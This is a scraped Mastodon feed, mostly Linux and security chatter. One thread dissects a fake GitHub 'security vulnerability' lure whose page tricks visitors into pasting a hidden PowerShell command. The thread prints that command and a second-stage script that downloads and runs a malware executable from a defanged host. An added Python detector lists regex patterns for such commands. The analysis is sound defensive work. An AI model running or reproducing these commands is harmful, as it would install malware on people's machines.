
atoponce

@atoponce@fosstodon.org

MSCSIA, cryptography, security, locksport, Linux, programming, mathematics, amateur radio, Buddhism, running, anime, and bibliophilia.


atoponce (@atoponce@fosstodon.org), to random

The comments. Good god.

https://www.reddit.com/r/linuxmemes/comments/1r5dh47/begun_the_distro_wars_have_ubuntu_vs_debian/

atoponce (@atoponce@fosstodon.org), to random

4th Edition in your browser.

https://unixv4.dev/

atoponce (@atoponce@fosstodon.org), to random

Private Reddit profiles aren't actually private. With the profile pulled up, search for " " (space) and all their posts and comments will be visible.

atoponce (@atoponce@fosstodon.org), to random

McDonald's advertising Debian GNU/Linux

briankrebs (@briankrebs@infosec.exchange), to random

Was searching my Signal contacts for something something "N" and found a contact I'd not noticed before: Note to Self. One of these days I will just RTFM.

"Who is Note to Self?

This contact entry is a chat to send messages to yourself.
Use this feature to jot down a note for yourself to review later or to share messages and files with your linked devices.
All messages in Note to Self are end-to-end encrypted Signal messages.
Yes, you can send disappearing messages to yourself. The timer starts immediately."

https://support.signal.org/hc/en-us/articles/360043272451-Note-to-Self

atoponce (@atoponce@fosstodon.org)

@briankrebs It's a great feature. I use it for sending photos, notes, file attachments, passwords, and all sorts of shit. I set it for disappearing messages after 1 week. Works like a charm.

nixCraft (@nixCraft@mastodon.social), (edited) to random

Poll: Do you prefer a wireless or wired mouse? 🤔

atoponce (@atoponce@fosstodon.org)

@nixCraft Batteries suck.

nixCraft (@nixCraft@mastodon.social), to random

[Thread, post or comment was deleted by the author]

    atoponce (@atoponce@fosstodon.org)

    @nixCraft

    but_why.gif

    atoponce (@atoponce@fosstodon.org), to random

    Developer applies at @ubuntu, goes through extensive hiring filters and many interviews, gets an offer in hand, accepts the offer, quits their job, only for Canonical to retract the offer.

    Don't work for Canonical.

    https://www.reddit.com/r/linux/comments/1ij4itg/canonical_what_a_shame/

    atoponce (@atoponce@fosstodon.org), to random

    I just got an email from GitHub about a new issue for my password generator.

    "Hey there!

    We have detected a security vulnerability in your repository. Please contact us at https://github-scanner[.]com to get more information on how to fix this issue.

    Best regards,
    Github Security Team"

    Uh huh. A security vulnerability for a password generator. Maybe, but I'm skeptical.

    However, the issue no longer exists. Looks like GitHub took it down as spam.

    I'm curious about that URL though.

    1/n

    atoponce (@atoponce@fosstodon.org), OP

    Visiting github-scanner[.]com I need to verify that I'm human. Okay. Sure. It then requests I do the following:

    1. Press Windows Button + R.
    2. Press CTRL + V
    3. Press Enter

    In other words, pull up a shell and paste whatever is in my clipboard.

    What's in the clipboard you ask?

    powershell.exe -w hidden -Command "iex (iwr 'https://github-scanner[.]com/download.txt').Content" # "✅ ''I am not a robot - reCAPTCHA Verification ID: 93752"

    "download.txt". Yeah, I'm suuuuure that's a text file.

    2/n

    atoponce (@atoponce@fosstodon.org), OP

    So, grabbing https://github-scanner[.]com/download.txt and pulling it up in a text editor reveals the following:

    $webClient = New-Object System.Net.WebClient
    $url1 = "https://github-scanner[.]com/l6E.exe"
    $filePath1 = "$env:TEMP\SysSetup.exe"
    $webClient.DownloadFile($url1, $filePath1)
    Start-Process -FilePath $env:TEMP\SysSetup.exe

    "l6E.exe". Any bets on whether or not that's malware?

    Sure enough, it's a positive match with VirusTotal.

    https://www.virustotal.com/gui/file/d737637ee5f121d11a6f3295bf0d51b06218812b5ec04fe9ea484921e905a207

    3/3
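
A defender-side check for the paste-and-run command described in this thread, as an added example that is not part of the original posts: it scores command lines (for instance from process-creation logs or the Win+R `RunMRU` history) on the traits visible in the quoted command. The indicator names, verdict labels and the three non-thread samples are constructed for illustration.

```python
import re

# Indicators drawn from the clipboard command quoted in the thread above.
INDICATORS = {
    "powershell": re.compile(r"\b(?:powershell|pwsh)(?:\.exe)?\b", re.I),
    "hidden_window": re.compile(r"\s[-/]w[a-z]*\s+[\"']?hidden\b", re.I),
    "run_downloaded_code": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "web_fetch": re.compile(
        r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|"
        r"downloadstring|downloadfile)\b", re.I),
    # Trailing PowerShell comment dressed up as a CAPTCHA receipt.
    "decoy_comment": re.compile(
        r"#[^\n]*\b(?:robot|recaptcha|captcha|human|verif\w*)\b", re.I),
}

def from_runmru(value: str) -> str:
    """Win+R history values in the RunMRU registry key end with a literal \\1."""
    return value[:-2] if value.endswith("\\1") else value

def classify(command_line: str):
    """Return (verdict, matched indicator names) for one command line."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(command_line)]
    if "powershell" not in hits:
        return "ignore", hits
    fetch_and_run = {"run_downloaded_code", "web_fetch"} <= set(hits)
    concealment = {"hidden_window", "decoy_comment"} & set(hits)
    if fetch_and_run and concealment:
        return "alert", hits    # downloads and runs code while hiding it from the user
    if fetch_and_run or concealment:
        return "review", hits   # one half of the pattern; needs a human look
    return "ignore", hits

# Constructed samples; "thread" is the command from the post, domain still defanged.
SAMPLES = {
    "thread": r'''powershell.exe -w hidden -Command "iex (iwr 'https://github-scanner[.]com/download.txt').Content" # "✅ ''I am not a robot - reCAPTCHA Verification ID: 93752"''',
    "admin_script": r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1",
    "plain_fetch": 'powershell -Command "iwr https://intranet.example/tool.ps1 | iex"',
    "not_powershell": r"notepad.exe C:\notes\captcha-verification.txt",
}

if __name__ == "__main__":
    for name, cmd in SAMPLES.items():
        verdict, hits = classify(from_runmru(cmd))
        print(f"{name:15} {verdict:7} {hits}")
```
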

    nixCraft (@nixCraft@mastodon.social), (edited) to random

    Have you ever rebooted the wrong server in production?

    atoponce (@atoponce@fosstodon.org)

    @nixCraft I had a set of shells open in our dev environment in one virtual desktop and a set of shells open to our prod environment in another virtual desktop.

    Not paying attention, thinking I was rebooting all the servers in dev, I was in the wrong virtual desktop, and rebooted all the servers in prod.

    Worse, prod included MooseFS of which the metadata server is a single point of failure.

    We were down for hours, and my boss was PISSED. It was a long night.

    nixCraft (@nixCraft@mastodon.social), to random

    If you don’t understand recursion, reread this post again 🤭

    atoponce (@atoponce@fosstodon.org)

    atoponce (@atoponce@fosstodon.org), to random

    Generative AI is garbage, exhibit 99:

    atoponce (@atoponce@fosstodon.org), to random

    > “Dad, why is my sister’s name Rose?”

    “Because that’s your mother’s favorite flower.”

    > “Thanks, Dad!”

    “No problem, Fortran.”

    atoponce (@atoponce@fosstodon.org), to random

    You guys don't understand.

    If Google pays taxes in a random country, to cheat the system and save money, that's clever because "Globalism".

    If you do it, you get banned though.

    It's like work, employers can outsource any job, but if you do it you get fired.

    Or you know, CEOs can work for multiple companies. If you do it, it’s time theft.

    https://techcrunch.com/2024/06/20/youtube-confirms-crackdown-on-vpn-users-accessing-cheaper-premium-plans/

    atoponce (@atoponce@fosstodon.org), to random

    Passkeys are indeed a shattered dream. Everything in this post is spot on with my experience using them.

    In theory, I love the idea. In practice, it's a horrible, horrible, horrible UX.

    I'll stick with + security keys/TOTP until this mess gets cleaned up.

    https://fy.blackhats.net.au/blog/2024-04-26-passkeys-a-shattered-dream/

    atoponce (@atoponce@fosstodon.org), to random

    How it started: How it's going:
